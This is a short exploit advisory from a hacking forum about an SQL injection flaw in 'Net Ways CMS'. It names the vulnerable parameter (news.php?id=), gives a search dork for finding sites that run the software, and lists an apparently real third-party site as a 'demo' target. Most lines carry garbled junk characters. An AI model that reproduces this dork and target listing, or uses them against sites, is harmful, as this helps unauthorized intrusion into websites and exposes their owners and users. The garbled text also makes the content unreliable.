Net Ways CMS SQL Injection

admin

################################################################################??########  
- q# u! W; G! h  }2 k# x6 F#  
# Exploit Title : Net Ways Cms Sql Injection Vulnerability  
' N4 X* V$ Y3 \. d. ^1 j" c; a' K9 S#  
8 q$ Y! l, v7 S9 x: f& V# Author        : IrIsT.Ir  
4 l& O& D6 b8 \#  
# Discovered By : Am!r  
#  
# Home          : http://IrIsT.Ir/forum  
#  
) D; x6 o5 d4 G8 n: u/ j6 T# Software Link : http://www.netways.com/   www.political-security.com
0 V& y3 _  A+ |+ I#  
; R$ M9 u! z. V: }5 D8 I: u# Security Risk : High  
#  
( ]5 X4 M( U4 v& S/ r# Version       : All Version  
7 w% r$ I9 [% `' N) ^/ B1 \#  
! y' }2 u% X4 ^* ~2 {# Tested on     : GNU/Linux Ubuntu - Windows Server - win7  
#  
* M5 T1 v! g/ E) n! l) j, k# Dork          : intext:"Designed & developed by NetWays"  
#  
################################################################################??########  
9 ^6 J/ u- U9 `- h#  
" W8 ?8 L; ]# c- D& h; G#  Expl0iTs :  
#  
# R4 F4 H) [3 w7 N: k6 u#  http://target.com/news.php?id=[Sql]  
( j% P7 p4 o6 K#  
2 O* j4 {! B4 c7 x) j8 ?#  
# D3mo :  
#  
1 w0 W. y5 o& \- q' A! W3 T# http://compagnieparento.com/news.php?id=7[Sql]  
" V1 m) S& F( {5 v- j, |1 u1 t5 H#  
1 q$ m: K+ S# V. x6 ^################################################################################??########  
#  
2 [0 [& Y9 }% L2 ?# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r   
#  
2 i( |# p: O9 C+ i  y8 ]# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r   
#  
* W+ v. D. R  C7 q1 s# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum  
+ I9 _4 c/ [, x9 D#  
: r& q( n# |2 ~5 F. A! g5 ^################################################################################??########